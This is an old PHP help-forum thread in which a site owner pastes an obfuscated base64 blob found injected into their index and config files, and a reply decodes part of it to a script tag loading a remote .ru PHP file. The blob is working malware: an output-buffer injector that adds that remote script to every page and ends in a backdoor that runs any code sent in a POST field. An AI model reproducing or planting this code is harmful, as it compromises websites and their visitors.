Jump to content

Recommended Posts

Hello Friends,

Need your help desperately. My site has just been hacked. Someone has put the following javascript code in my index file, config file.

 

Code:

eval(base64_decode('aWYoIWlzc2V0KCRkMGpuMSkpe2Z1bmN0aW9uIGQwam4oJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNj  cmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYp  KT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVn  X21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwn  ZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFte  Pl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxz  Kj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9  cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNl  KCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXZZbmxrYVdOcmNtOWpheTV5ZFM5b2IzQmxMM2xo  Ym1SbGVGODJObUUzT1RjelpqWmxZV1k1WW1FNUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi  b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkk  cy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBkMGpuMigkYSwkYiwkYywkZCl7Z2xvYmFsICRkMGpuMTskcz1hcnJheSgpO2lmKGZ1  bmN0aW9uX2V4aXN0cygkZDBqbjEpKWNhbGxfdXNlcl9mdW5jKCRkMGpuMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0  YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMGpuJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJyli  cmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRz  KS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2Qwam4n  KTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZDBqbmw9  KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Qwam4yJykpIT0nZDBqbjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb  J2UnXSkpOw==')); ?>

I have XSS injection blocking code for all my inputs. Not sure at all, how this has happened. Any help would be greatly appreciated. Thankx.

 

Link to comment
https://forums.phpfreaks.com/topic/177394-have-been-hacked-pls-help/
Share on other sites

Can't speculate as to how they got it in there, but if you decode all that there's a script tag trying to include "http://mobydickrock.ru/hope/yandex_66a7973f6eaf9ba9.php". My Russian isn't exactly fluent but from visiting mobydickrock.ru just looks like some kind of normal rock music website.. Can't see them wanting to/intentionally doing this to you. Perhaps run your site through some security tools and seeing if they pick up on any vulnerabilities so you could prevent this from happening again.

  • 2 weeks later...
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.